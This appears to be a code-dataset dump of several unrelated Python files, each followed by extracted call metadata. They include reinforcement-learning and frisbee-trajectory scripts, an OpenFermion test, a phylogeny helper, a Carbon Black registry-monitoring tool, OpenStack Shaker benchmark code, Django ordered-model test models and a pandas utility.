train(maze_env, model_dir, **vars(args))
if __name__ == '__main__':
main()
| [((15, 13, 15, 38), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ({}, {}), '()', False, 'import argparse\n'), ((45, 23, 45, 63), 'collections.defaultdict', 'defaultdict', ({(45, 35, 45, 44): 'lambda : 0', (45, 46, 45, 62): 'q_value_function'}, {}), '(lambda : 0, q_value_function)', False, 'from collections import defaultdict\n'), ((46, 22, 46, 91), 'collections.defaultdict', 'defaultdict', ({(46, 34, 46, 73): 'lambda : [False] * maze_env.action_space.n', (46, 75, 46, 90): 'visited_actions'}, {}), '(lambda : [False] * maze_env.action_space.n, visited_actions)', False, 'from collections import defaultdict\n'), ((48, 12, 48, 23), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((50, 10, 50, 56), 'progress.bar.IncrementalBar', 'IncrementalBar', (), '', False, 'from progress.bar import IncrementalBar\n'), ((82, 10, 82, 21), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((90, 13, 90, 56), 'csv.DictWriter', 'csv.DictWriter', (), '', False, 'import csv\n'), ((98, 13, 98, 56), 'csv.DictWriter', 'csv.DictWriter', (), '', False, 'import csv\n'), ((115, 15, 115, 58), 'utils.make_env', 'utils.make_env', ({(115, 30, 115, 38): 'args.env', (115, 40, 115, 57): 'args.seed + 10000'}, {}), '(args.env, args.seed + 10000)', False, 'import utils\n'), ((118, 16, 118, 175), 'utils.get_model_dir', 'utils.get_model_dir', ({(118, 36, 118, 174): "args.env + '/' + args.dir + '/aQL/lr%.2f_discount%.2f_eps%.2f/epi%dseed%d' % (\n args.lr, args.discount, args.eps, args.num_episode, args.seed)"}, {}), "(args.env + '/' + args.dir + \n '/aQL/lr%.2f_discount%.2f_eps%.2f/epi%dseed%d' % (args.lr, args.\n discount, args.eps, args.num_episode, args.seed))", False, 'import utils\n'), ((119, 4, 119, 41), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((60, 15, 60, 30), 'random.random', 'random.random', ({}, {}), '()', False, 'import random\n'), ((61, 25, 61, 71), 'random.randint', 'random.randint', ({(61, 40, 61, 41): '0', (61, 43, 61, 70): 'maze_env.action_space.n - 1'}, {}), '(0, maze_env.action_space.n - 1)', False, 'import random\n'), ((68, 33, 68, 79), 'random.randint', 'random.randint', ({(68, 48, 68, 49): '0', (68, 51, 68, 78): 'maze_env.action_space.n - 1'}, {}), '(0, maze_env.action_space.n - 1)', False, 'import random\n')] |
carrino/FrisPy | research/tunnel.py | db9e59f465ee25d1c037d580c37da8f35b930b50 | import math
from pprint import pprint
import matplotlib.pyplot as plt
from scipy.optimize import minimize
from frispy import Disc
from frispy import Discs
from frispy import Model
model = Discs.roc
mph_to_mps = 0.44704
v = 56 * mph_to_mps
rot = -v / model.diameter
ceiling = 4 # 4 meter ceiling
tunnel_width = 4 # 4 meter wide tunnel
def distance(x):
a, nose_up, hyzer = x
d = Disc(model, {"vx": math.cos(a * math.pi / 180) * v, "dgamma": rot, "vz": math.sin(a * math.pi / 180) * v,
"nose_up": nose_up, "hyzer": hyzer})
r = d.compute_trajectory(15.0, **{"max_step": .2})
rx = r.x[-1]
ry = abs(r.y[-1])
    overCeilingIndex = next(filter(lambda i: r.z[i] > ceiling, range(len(r.z))), None)
    if overCeilingIndex is not None:
        return -r.x[overCeilingIndex]
outsideTunnelIndex = next(filter(lambda i: math.fabs(r.y[i]) > tunnel_width / 2, range(len(r.z))), None)
if outsideTunnelIndex is not None:
return -r.x[outsideTunnelIndex]
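    # No constraint violated: minimize() drives this toward long flights
    # (large rx); the small ry / (rx + ry) term breaks ties in favor of
    # straighter flights (small lateral drift).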
return -rx + ry / (rx + ry)
bnds = [(-90, 90)] * 3
x0 = [6, -3, 10]
res = minimize(distance, x0, method='powell', bounds=bnds, options={'xtol': 1e-8, 'disp': True})
pprint(res)
a, nose_up, hyzer = res.x
disc = Disc(model, {"vx": math.cos(a * math.pi / 180) * v, "dgamma": rot, "vz": math.sin(a * math.pi / 180) * v,
"nose_up": nose_up, "hyzer": hyzer})
result = disc.compute_trajectory(15.0, **{"max_step": .2})
t, x, y, z = result.times, result.x, result.y, result.z
#plt.plot(x, y)
#plt.plot(x, z)
#plt.plot(t, x)
plt.plot(t, y)
plt.plot(t, z)
pprint(x[-1] * 3.28084) # feet
plt.show()
| [((39, 6, 39, 96), 'scipy.optimize.minimize', 'minimize', (), '', False, 'from scipy.optimize import minimize\n'), ((40, 0, 40, 11), 'pprint.pprint', 'pprint', ({(40, 7, 40, 10): 'res'}, {}), '(res)', False, 'from pprint import pprint\n'), ((53, 0, 53, 14), 'matplotlib.pyplot.plot', 'plt.plot', ({(53, 9, 53, 10): 't', (53, 12, 53, 13): 'y'}, {}), '(t, y)', True, 'import matplotlib.pyplot as plt\n'), ((54, 0, 54, 14), 'matplotlib.pyplot.plot', 'plt.plot', ({(54, 9, 54, 10): 't', (54, 12, 54, 13): 'z'}, {}), '(t, z)', True, 'import matplotlib.pyplot as plt\n'), ((56, 0, 56, 23), 'pprint.pprint', 'pprint', ({(56, 7, 56, 22): '(x[-1] * 3.28084)'}, {}), '(x[-1] * 3.28084)', False, 'from pprint import pprint\n'), ((58, 0, 58, 10), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((42, 26, 42, 53), 'math.cos', 'math.cos', ({(42, 35, 42, 52): 'a * math.pi / 180'}, {}), '(a * math.pi / 180)', False, 'import math\n'), ((42, 80, 42, 107), 'math.sin', 'math.sin', ({(42, 89, 42, 106): 'a * math.pi / 180'}, {}), '(a * math.pi / 180)', False, 'import math\n'), ((21, 27, 21, 54), 'math.cos', 'math.cos', ({(21, 36, 21, 53): 'a * math.pi / 180'}, {}), '(a * math.pi / 180)', False, 'import math\n'), ((21, 81, 21, 108), 'math.sin', 'math.sin', ({(21, 90, 21, 107): 'a * math.pi / 180'}, {}), '(a * math.pi / 180)', False, 'import math\n'), ((31, 47, 31, 64), 'math.fabs', 'math.fabs', ({(31, 57, 31, 63): 'r.y[i]'}, {}), '(r.y[i])', False, 'import math\n')] |
unpilbaek/OpenFermion-Cirq | openfermioncirq/variational/ansatzes/swap_network_trotter_hubbard_test.py | d2f5a871bb5aea1e53d280c0a0e4be999b0c8d9d | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from openfermioncirq.variational.ansatzes import SwapNetworkTrotterHubbardAnsatz
def test_swap_network_trotter_hubbard_ansatz_param_bounds():
ansatz = SwapNetworkTrotterHubbardAnsatz(3, 1, 1.0, 4.0, periodic=False)
assert list(symbol.name for symbol in ansatz.params()) == [
'Th_0', 'V_0',]
assert ansatz.param_bounds() == [
(-2.0, 2.0), (-1.0, 1.0)]
ansatz = SwapNetworkTrotterHubbardAnsatz(1, 4, 1.0, 4.0, periodic=False)
assert list(symbol.name for symbol in ansatz.params()) == [
'Tv_0', 'V_0',]
assert ansatz.param_bounds() == [
(-2.0, 2.0), (-1.0, 1.0)]
ansatz = SwapNetworkTrotterHubbardAnsatz(3, 2, 1.0, 4.0)
assert list(symbol.name for symbol in ansatz.params()) == [
'Th_0', 'Tv_0', 'V_0',]
assert ansatz.param_bounds() == [
(-2.0, 2.0), (-2.0, 2.0), (-1.0, 1.0)]
| [((18, 13, 18, 76), 'openfermioncirq.variational.ansatzes.SwapNetworkTrotterHubbardAnsatz', 'SwapNetworkTrotterHubbardAnsatz', (), '', False, 'from openfermioncirq.variational.ansatzes import SwapNetworkTrotterHubbardAnsatz\n'), ((24, 13, 24, 76), 'openfermioncirq.variational.ansatzes.SwapNetworkTrotterHubbardAnsatz', 'SwapNetworkTrotterHubbardAnsatz', (), '', False, 'from openfermioncirq.variational.ansatzes import SwapNetworkTrotterHubbardAnsatz\n'), ((30, 13, 30, 60), 'openfermioncirq.variational.ansatzes.SwapNetworkTrotterHubbardAnsatz', 'SwapNetworkTrotterHubbardAnsatz', ({(30, 45, 30, 46): '3', (30, 48, 30, 49): '2', (30, 51, 30, 54): '1.0', (30, 56, 30, 59): '4.0'}, {}), '(3, 2, 1.0, 4.0)', False, 'from openfermioncirq.variational.ansatzes import SwapNetworkTrotterHubbardAnsatz\n')] |
DaneshMoradigaravand/PlasmidPerm | Modules/Phylogenetic.py | 7a84c1d4dbf7320dd5ba821ff0e715a89fe4b3e4 | import os
from Bio import AlignIO, Phylo
from Bio.Phylo.TreeConstruction import DistanceCalculator, DistanceTreeConstructor
class Phylogenetic:
def __init__(self, PATH):
        self.PATH = PATH
def binary_sequence_generator(self, input_kmer_pattern, label):
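        # Encode the binary k-mer presence/absence pattern as a pseudo-DNA
        # string ('A' = absent, 'C' = present) so the standard sequence
        # distance tools used below can operate on it.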
string_inp="".join([ 'A' if x==0 else 'C' for x in input_kmer_pattern])
return([">"+label,string_inp])
def multifasta_fille_generator(self, converted_sequences_phyolgenetic):
file_output = open(os.path.join(self.PATH,"binary_presence_absence_kmers.fasta"), "w")
file_output.writelines('\n'.join(converted_sequences_phyolgenetic) + '\n' )
file_output.close()
def distance_matrix_generator(self):
align = AlignIO.read(os.path.join(self.PATH,"binary_presence_absence_kmers.fasta"), "fasta")
calculator = DistanceCalculator('identity')
distMatrix = calculator.get_distance(align)
return(distMatrix)
def distance_tree_file_generator(self,distance_matrix):
constructor = DistanceTreeConstructor()
UPGMATree = constructor.upgma(distance_matrix)
Phylo.write(UPGMATree, os.path.join(self.PATH,"binary_presence_absence_kmers.tre") , "newick") | [((20, 21, 20, 51), 'Bio.Phylo.TreeConstruction.DistanceCalculator', 'DistanceCalculator', ({(20, 40, 20, 50): '"""identity"""'}, {}), "('identity')", False, 'from Bio.Phylo.TreeConstruction import DistanceCalculator, DistanceTreeConstructor\n'), ((25, 22, 25, 47), 'Bio.Phylo.TreeConstruction.DistanceTreeConstructor', 'DistanceTreeConstructor', ({}, {}), '()', False, 'from Bio.Phylo.TreeConstruction import DistanceCalculator, DistanceTreeConstructor\n'), ((14, 27, 14, 88), 'os.path.join', 'os.path.join', ({(14, 40, 14, 49): 'self.PATH', (14, 50, 14, 87): '"""binary_presence_absence_kmers.fasta"""'}, {}), "(self.PATH, 'binary_presence_absence_kmers.fasta')", False, 'import os\n'), ((19, 29, 19, 90), 'os.path.join', 'os.path.join', ({(19, 42, 19, 51): 'self.PATH', (19, 52, 19, 89): '"""binary_presence_absence_kmers.fasta"""'}, {}), "(self.PATH, 'binary_presence_absence_kmers.fasta')", False, 'import os\n'), ((27, 31, 27, 90), 'os.path.join', 'os.path.join', ({(27, 44, 27, 53): 'self.PATH', (27, 54, 27, 89): '"""binary_presence_absence_kmers.tre"""'}, {}), "(self.PATH, 'binary_presence_absence_kmers.tre')", False, 'import os\n')] |
cbcommunity/cbapi-examples | retrieve_regmod_values.py | f8a81006b27c724582b4b04c124eb97a8c8e75d3 | #!/usr/bin/env python
#
#The MIT License (MIT)
#
# Copyright (c) 2015 Bit9 + Carbon Black
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# -----------------------------------------------------------------------------
# Extension regmod watcher and grabber
#
# This script listens to the CB messaging bus for registry modification events,
# and when a modification is seen that matches a regular expression from a file
# of registry path regular expressions, it goes and grabs the registry value
# using CB Live Response.
#
# You need to make sure rabbitmq is enabled in cb.conf, and you might need to
# open a firewall rule for port 5004. You also will need to enable regmod
# in the DatastoreBroadcastEventTypes=<values> entry. If anything is changed
# here, you'll have to do service cb-enterprise restart.
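#
# For example (illustrative cb.conf fragment -- adjust to your install):
#   DatastoreBroadcastEventTypes=regmod
# then: service cb-enterprise restart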
#
# TODO: More error handling, more performance improvements
#
# last updated 2016-01-23 by Ben Johnson [email protected] ([email protected])
#
import re
import Queue
import sys
from threading import Thread
import time
import traceback
try:
from cbapi.legacy.util.cli_helpers import main_helper
from cbapi.legacy.util.composite_helpers import MessageSubscriberAndLiveResponseActor
import cbapi.legacy.util.sensor_events_pb2 as cpb
except ImportError:
from cbapi.util.cli_helpers import main_helper
from cbapi.util.composite_helpers import MessageSubscriberAndLiveResponseActor
import cbapi.util.sensor_events_pb2 as cpb
class RegistryModWatcherAndValueGrabber(MessageSubscriberAndLiveResponseActor):
"""
This class subscribes to messages from the CB messaging bus,
looking for regmod events. For each regmod event, it checks
to see if the the registry path matches one of our regexes.
If it does, it goes and grabs it.
"""
def __init__(self, cb_server_url, cb_ext_api, username, password, regmod_regexes, verbose):
self.regmod_regexes = regmod_regexes
self.verbose = verbose
MessageSubscriberAndLiveResponseActor.__init__(self,
cb_server_url,
cb_ext_api,
username,
password,
"ingress.event.regmod")
# Threading so that message queue arrives do not block waiting for live response
self.queue = Queue.Queue()
self.go = True
self.worker_thread = Thread(target=self._worker_thread_loop)
self.worker_thread.start()
def on_stop(self):
self.go = False
self.worker_thread.join(timeout=2)
MessageSubscriberAndLiveResponseActor.on_stop(self)
def consume_message(self, channel, method_frame, header_frame, body):
if "application/protobuf" != header_frame.content_type:
return
try:
# NOTE -- this is not very efficient in PYTHON, and should
# use a C parser to make this much, much faster.
# http://yz.mit.edu/wp/fast-native-c-protocol-buffers-from-python/
x = cpb.CbEventMsg()
x.ParseFromString(body)
if not x.regmod or x.regmod.action != 2:
# Check for MODIFICATION event because we will usually get
# a creation event and a modification event, and might as
# well go with the one that says data has actually been written.
return
regmod_path = None
if x.regmod.utf8_regpath:
if self.verbose:
print "Event arrived: |%s|" % x.regmod.utf8_regpath
for regmod_regex in self.regmod_regexes:
if regmod_regex.match(x.regmod.utf8_regpath):
regmod_path = x.regmod.utf8_regpath
break
if regmod_path:
regmod_path = regmod_path.replace("\\registry\\machine\\", "HKLM\\")
regmod_path = regmod_path.replace("\\registry\\user\\", "HKEY_USERS\\")
regmod_path = regmod_path.strip()
# TODO -- more cleanup here potentially?
self.queue.put((x, regmod_path))
except:
traceback.print_exc()
def _worker_thread_loop(self):
while self.go:
try:
try:
(x, regmod_path) = self.queue.get(timeout=0.5)
except Queue.Empty:
continue
# TODO -- could comment this out if you want CSV data to feed into something
print "--> Attempting for %s" % regmod_path
# Go Grab it if we think we have something!
sensor_id = x.env.endpoint.SensorId
hostname = x.env.endpoint.SensorHostName
# TODO -- this could use some concurrency and work queues because we could wait a while for
# each of these to get established and retrieve the value
# Establish our CBLR session if necessary!
lrh = self._create_lr_session_if_necessary(sensor_id)
data = lrh.get_registry_value(regmod_path)
print "%s,%s,%d,%s,%s,%s" % ( time.asctime(),
hostname,
sensor_id,
x.header.process_path,
regmod_path,
data.get('value_data', "") if data else "<UNKNOWN>")
# TODO -- could *do something* here, like if it is for autoruns keys then go check the signature status
# of the binary at the path pointed to, and see who wrote it out, etc
except:
traceback.print_exc()
def main(cb, args):
username = args.get("username")
password = args.get("password")
regpaths_file = args.get("regpaths_file")
verbose = args.get("verbose", False)
if verbose:
# maybe you want to print out all the regpaths we're using?
print "Regpaths file:", regpaths_file
f = file(regpaths_file, 'rb')
regpaths_data = f.read()
f.close()
regmod_regexes = []
for line in regpaths_data.split('\n'):
line = line.strip()
if len(line) == 0:
continue
regmod_regexes.append(re.compile(line))
listener = RegistryModWatcherAndValueGrabber(args.get('server_url'), cb, username, password, regmod_regexes, verbose)
try:
if verbose:
print "Registry Mod Watcher and Grabber -- started. Watching for:", regpaths_data
else:
print "Registry Mod Watcher and Grabber -- started. Watching for %d regexes" % len(regmod_regexes)
listener.process()
except KeyboardInterrupt:
print >> sys.stderr, "Caught Ctrl-C"
listener.stop()
print "Registry Mod Watcher and Grabber -- stopped."
if __name__ == "__main__":
## YOU CAN USE data/autoruns_regexes.txt to test ##
required_args =[("-i", "--username", "store", None, "username", "CB messaging username"),
("-p", "--password", "store", None, "password", "CB messaging password"),
("-r", "--regpaths_file", "store", None, "regpaths_file", "File of newline delimited regexes for regpaths")]
optional_args = [("-v", "--verbose", "store_true", False, "verbose", "Enable verbose output")]
main_helper("Subscribe to message bus events and for each registry modification that matches one of our supplied regexes, go retrieve value.",
main,
custom_required=required_args,
custom_optional=optional_args)
| [] |
ssin122/test-h | h/exceptions.py | c10062ae23b690afaac0ab4af7b9a5a5e4b686a9 | # -*- coding: utf-8 -*-
"""Exceptions raised by the h application."""
from __future__ import unicode_literals
from h.i18n import TranslationString as _
# N.B. This class **only** covers exceptions thrown by API code provided by
# the h package. memex code has its own base APIError class.
class APIError(Exception):
"""Base exception for problems handling API requests."""
def __init__(self, message, status_code=500):
self.status_code = status_code
super(APIError, self).__init__(message)
class ClientUnauthorized(APIError):
"""
Exception raised if the client credentials provided for an API request
were missing or invalid.
"""
def __init__(self):
message = _('Client credentials are invalid.')
super(ClientUnauthorized, self).__init__(message, status_code=403)
class OAuthTokenError(APIError):
"""
Exception raised when an OAuth token request failed.
    This specifically handles OAuth errors which have a type (``type_``) and
    a description (``message``).
"""
def __init__(self, message, type_, status_code=400):
self.type = type_
super(OAuthTokenError, self).__init__(message, status_code=status_code)
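# Illustrative: OAuthTokenError('grant is expired', 'invalid_grant') yields
# .type == 'invalid_grant' and the default .status_code == 400.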
| [((29, 18, 29, 54), 'h.i18n.TranslationString', '_', ({(29, 20, 29, 53): '"""Client credentials are invalid."""'}, {}), "('Client credentials are invalid.')", True, 'from h.i18n import TranslationString as _\n')] |
opnfv-poc/functest | functest/opnfv_tests/openstack/shaker/shaker.py | 4f54b282cabccef2a53e21c77c81b60fe890a8a4 | #!/usr/bin/env python
# Copyright (c) 2018 Orange and others.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
"""
Shaker_ wraps around popular system network testing tools like iperf, iperf3
and netperf (with help of flent). Shaker is able to deploy OpenStack instances
and networks in different topologies. Shaker scenario specifies the deployment
and list of tests to execute.
.. _Shaker: http://pyshaker.readthedocs.io/en/latest/
"""
import logging
import os
import json
import scp
from functest.core import singlevm
from functest.utils import env
class Shaker(singlevm.SingleVm2):
"""Run shaker full+perf l2 and l3"""
# pylint: disable=too-many-instance-attributes
__logger = logging.getLogger(__name__)
filename = '/home/opnfv/functest/images/shaker-image-1.3.0+stretch.qcow2'
flavor_ram = 512
flavor_vcpus = 1
flavor_disk = 3
username = 'debian'
port = 9000
ssh_connect_loops = 12
create_server_timeout = 300
shaker_timeout = '3600'
quota_instances = -1
quota_cores = -1
def __init__(self, **kwargs):
super(Shaker, self).__init__(**kwargs)
self.role = None
def check_requirements(self):
if self.count_hypervisors() < 2:
self.__logger.warning("Shaker requires at least 2 hypervisors")
self.is_skipped = True
self.project.clean()
def prepare(self):
super(Shaker, self).prepare()
self.cloud.create_security_group_rule(
self.sec.id, port_range_min=self.port, port_range_max=self.port,
protocol='tcp', direction='ingress')
def execute(self):
"""
Returns:
- 0 if success
- 1 on operation error
"""
assert self.ssh
endpoint = self.get_public_auth_url(self.orig_cloud)
self.__logger.debug("keystone endpoint: %s", endpoint)
if self.orig_cloud.get_role("admin"):
role_name = "admin"
elif self.orig_cloud.get_role("Admin"):
role_name = "Admin"
else:
raise Exception("Cannot detect neither admin nor Admin")
self.orig_cloud.grant_role(
role_name, user=self.project.user.id,
project=self.project.project.id,
domain=self.project.domain.id)
if not self.orig_cloud.get_role("heat_stack_owner"):
self.role = self.orig_cloud.create_role("heat_stack_owner")
self.orig_cloud.grant_role(
"heat_stack_owner", user=self.project.user.id,
project=self.project.project.id,
domain=self.project.domain.id)
self.orig_cloud.set_compute_quotas(
self.project.project.name,
instances=self.quota_instances,
cores=self.quota_cores)
scpc = scp.SCPClient(self.ssh.get_transport())
scpc.put('/home/opnfv/functest/conf/env_file', remote_path='~/')
if os.environ.get('OS_CACERT'):
scpc.put(os.environ.get('OS_CACERT'), remote_path='~/os_cacert')
(_, stdout, stderr) = self.ssh.exec_command(
'source ~/env_file && '
'export OS_INTERFACE=public && '
'export OS_AUTH_URL={} && '
'export OS_USERNAME={} && '
'export OS_PROJECT_NAME={} && '
'export OS_PROJECT_ID={} && '
'unset OS_TENANT_NAME && '
'unset OS_TENANT_ID && '
'unset OS_ENDPOINT_TYPE && '
'export OS_PASSWORD="{}" && '
'{}'
'env && '
'timeout {} shaker --debug --image-name {} --flavor-name {} '
'--server-endpoint {}:9000 --external-net {} --dns-nameservers {} '
'--scenario openstack/full_l2,'
'openstack/full_l3_east_west,'
'openstack/full_l3_north_south,'
'openstack/perf_l3_north_south '
'--report report.html --output report.json'.format(
endpoint, self.project.user.name, self.project.project.name,
self.project.project.id, self.project.password,
'export OS_CACERT=~/os_cacert && ' if os.environ.get(
'OS_CACERT') else '',
self.shaker_timeout, self.image.name, self.flavor.name,
self.fip.floating_ip_address, self.ext_net.id,
env.get('NAMESERVER')))
self.__logger.info("output:\n%s", stdout.read().decode("utf-8"))
self.__logger.info("error:\n%s", stderr.read().decode("utf-8"))
if not os.path.exists(self.res_dir):
os.makedirs(self.res_dir)
try:
scpc.get('report.json', self.res_dir)
scpc.get('report.html', self.res_dir)
except scp.SCPException:
self.__logger.exception("cannot get report files")
return 1
with open(os.path.join(self.res_dir, 'report.json')) as json_file:
data = json.load(json_file)
for value in data["records"].values():
if value["status"] != "ok":
self.__logger.error(
"%s failed\n%s", value["scenario"], value["stderr"])
return 1
return stdout.channel.recv_exit_status()
def clean(self):
super(Shaker, self).clean()
if self.role:
self.orig_cloud.delete_role(self.role.id)
| [((33, 15, 33, 42), 'logging.getLogger', 'logging.getLogger', ({(33, 33, 33, 41): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((94, 11, 94, 38), 'os.environ.get', 'os.environ.get', ({(94, 26, 94, 37): '"""OS_CACERT"""'}, {}), "('OS_CACERT')", False, 'import os\n'), ((125, 15, 125, 43), 'os.path.exists', 'os.path.exists', ({(125, 30, 125, 42): 'self.res_dir'}, {}), '(self.res_dir)', False, 'import os\n'), ((126, 12, 126, 37), 'os.makedirs', 'os.makedirs', ({(126, 24, 126, 36): 'self.res_dir'}, {}), '(self.res_dir)', False, 'import os\n'), ((134, 19, 134, 39), 'json.load', 'json.load', ({(134, 29, 134, 38): 'json_file'}, {}), '(json_file)', False, 'import json\n'), ((95, 21, 95, 48), 'os.environ.get', 'os.environ.get', ({(95, 36, 95, 47): '"""OS_CACERT"""'}, {}), "('OS_CACERT')", False, 'import os\n'), ((122, 16, 122, 37), 'functest.utils.env.get', 'env.get', ({(122, 24, 122, 36): '"""NAMESERVER"""'}, {}), "('NAMESERVER')", False, 'from functest.utils import env\n'), ((133, 18, 133, 59), 'os.path.join', 'os.path.join', ({(133, 31, 133, 43): 'self.res_dir', (133, 45, 133, 58): '"""report.json"""'}, {}), "(self.res_dir, 'report.json')", False, 'import os\n'), ((118, 54, 119, 32), 'os.environ.get', 'os.environ.get', ({(119, 20, 119, 31): '"""OS_CACERT"""'}, {}), "('OS_CACERT')", False, 'import os\n')] |
hongrui16/naic2020_B | lib/models/bn_helper.py | 9321bdd19e7d2d47ac9c711eb8437cd364e25f44 | import torch
import functools
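# Pick a BatchNorm implementation based on the installed torch version:
# legacy 0.x builds use the bundled InPlaceABNSync, newer builds use the
# native torch.nn.BatchNorm2d (relu_inplace tracks what each variant allows).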
if torch.__version__.startswith('0'):
from .sync_bn.inplace_abn.bn import InPlaceABNSync
BatchNorm2d = functools.partial(InPlaceABNSync, activation='none')
BatchNorm2d_class = InPlaceABNSync
relu_inplace = False
else:
# BatchNorm2d_class = BatchNorm2d = torch.nn.SyncBatchNorm
BatchNorm2d_class = BatchNorm2d = torch.nn.BatchNorm2d
relu_inplace = True | [((4, 3, 4, 36), 'torch.__version__.startswith', 'torch.__version__.startswith', ({(4, 32, 4, 35): '"""0"""'}, {}), "('0')", False, 'import torch\n'), ((6, 18, 6, 70), 'functools.partial', 'functools.partial', (), '', False, 'import functools\n')] |
HiddenClever/django-ordered-model | ordered_model/tests/models.py | c94709403cfbb35fa4da3d6470ead816096fdec8 | from django.db import models
from ordered_model.models import OrderedModel, OrderedModelBase
class Item(OrderedModel):
name = models.CharField(max_length=100)
class Question(models.Model):
pass
class TestUser(models.Model):
pass
class Answer(OrderedModel):
question = models.ForeignKey(Question, on_delete=models.CASCADE, related_name='answers')
user = models.ForeignKey(TestUser, on_delete=models.CASCADE, related_name='answers')
order_with_respect_to = ('question', 'user')
class Meta:
ordering = ('question', 'user', 'order')
def __unicode__(self):
return u"Answer #{0:d} of question #{1:d} for user #{2:d}".format(self.order, self.question_id, self.user_id)
class CustomItem(OrderedModel):
id = models.CharField(max_length=100, primary_key=True)
name = models.CharField(max_length=100)
modified = models.DateTimeField(null=True, blank=True)
class CustomOrderFieldModel(OrderedModelBase):
sort_order = models.PositiveIntegerField(editable=False, db_index=True)
name = models.CharField(max_length=100)
order_field_name = 'sort_order'
class Meta:
ordering = ('sort_order',)
class Topping(models.Model):
name = models.CharField(max_length=100)
class Pizza(models.Model):
name = models.CharField(max_length=100)
toppings = models.ManyToManyField(Topping, through='PizzaToppingsThroughModel')
class PizzaToppingsThroughModel(OrderedModel):
pizza = models.ForeignKey(Pizza, on_delete=models.CASCADE)
topping = models.ForeignKey(Topping, on_delete=models.CASCADE)
order_with_respect_to = 'pizza'
class Meta:
ordering = ('pizza', 'order')
class BaseQuestion(OrderedModel):
order_class_path = __module__ + '.BaseQuestion'
question = models.TextField(max_length=100)
class Meta:
ordering = ('order',)
class MultipleChoiceQuestion(BaseQuestion):
good_answer = models.TextField(max_length=100)
wrong_answer1 = models.TextField(max_length=100)
wrong_answer2 = models.TextField(max_length=100)
wrong_answer3 = models.TextField(max_length=100)
class OpenQuestion(BaseQuestion):
answer = models.TextField(max_length=100)
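

# Hedged usage sketch (not part of the original test models): OrderedModel
# maintains the "order" field and exposes reordering helpers such as up(),
# down(), top(), bottom() and to(n). The object names below are hypothetical.
#
#   first = Item.objects.create(name='first')    # order == 0
#   second = Item.objects.create(name='second')  # order == 1
#   second.up()       # swap with the item above it
#   first.bottom()    # move to the end of the ordering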
| [((6, 11, 6, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((18, 15, 18, 92), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import models\n'), ((19, 11, 19, 88), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import models\n'), ((30, 9, 30, 59), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((31, 11, 31, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((32, 15, 32, 58), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import models\n'), ((36, 17, 36, 75), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', (), '', False, 'from django.db import models\n'), ((37, 11, 37, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((45, 11, 45, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((49, 11, 49, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((50, 15, 50, 83), 'django.db.models.ManyToManyField', 'models.ManyToManyField', (), '', False, 'from django.db import models\n'), ((54, 12, 54, 62), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import models\n'), ((55, 14, 55, 66), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import models\n'), ((63, 15, 63, 47), 'django.db.models.TextField', 'models.TextField', (), '', False, 'from django.db import models\n'), ((68, 18, 68, 50), 'django.db.models.TextField', 'models.TextField', (), '', False, 'from django.db import models\n'), ((69, 20, 69, 52), 'django.db.models.TextField', 'models.TextField', (), '', False, 'from django.db import models\n'), ((70, 20, 70, 52), 'django.db.models.TextField', 'models.TextField', (), '', False, 'from django.db import models\n'), ((71, 20, 71, 52), 'django.db.models.TextField', 'models.TextField', (), '', False, 'from django.db import models\n'), ((74, 13, 74, 45), 'django.db.models.TextField', 'models.TextField', (), '', False, 'from django.db import models\n')] |
SACGF/variantgrid | library/pandas_utils.py | 515195e2f03a0da3a3e5f2919d8e0431babfd9c9 | import os
import sys
import numpy as np
import pandas as pd
def get_columns_percent_dataframe(df: pd.DataFrame, totals_column=None, percent_names=True) -> pd.DataFrame:
""" @param totals_column: (default = use sum of columns)
@param percent_names: Rename names from 'col' => 'col %'
Return a dataframe as a percentage of totals_column if provided, or sum of columns """
percent_df = pd.DataFrame(index=df.index)
columns = df.columns
if totals_column:
totals_series = df[totals_column]
        columns = columns.drop(totals_column)  # Index arithmetic with "-" is unsupported in modern pandas
else:
totals_series = df.sum(axis=1)
